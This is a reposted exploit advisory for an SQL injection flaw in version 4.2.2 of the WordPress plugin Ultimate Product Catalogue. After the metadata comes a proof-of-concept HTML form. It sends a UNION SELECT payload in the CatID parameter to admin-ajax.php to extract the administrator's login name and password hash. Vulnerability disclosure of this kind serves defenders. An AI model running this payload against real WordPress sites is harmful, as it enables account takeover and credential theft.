WordPress Plugin Ultimate Product Catalogue 4.2.2 SQL Injection

2017.06.28

Credit: Lenon Leite

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

# Exploit Title: Ultimate Product Catalogue 4.2.2 Sql Injection – Plugin WordPress – Sql Injection
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/

# Software Link: https://wordpress.org/plugins/ultimate-product-catalogue/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 4.2.2
# Tested on: Ubuntu 16.04

1 - Description:

Type user access: register user.

$_POST[‘CatID’] is not escaped.

http://lenonleite.com.br/en/blog/2017/05/31/english-ultimate-product-catalogue-4-2-2-sql-injection/

2 - Proof of Concept:

1 – Login as regular user (created using wp-login.php?action=register):

2 – Using:

<*form method="post"
action="http://target/wp-admin/admin-ajax.php?action=get_upcp_subcategories">
<*input type="text" name="CatID" value="0 UNION SELECT
user_login,user_pass FROM wp_users WHERE ID=1">
<*input type="submit">

*delete “*” in code*

3 - Timeline:

- 22/05/2017 – Discovered
- 24/05/2017 – Vendor not finded
- **/06/2017 - Corrected

***Rename plugin txt to zip. Problem with gmail block.
-- 
*Atenciosamente*

*Lenon Leite​​*

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress Plugin Ultimate Product Catalogue 4.2.2 SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.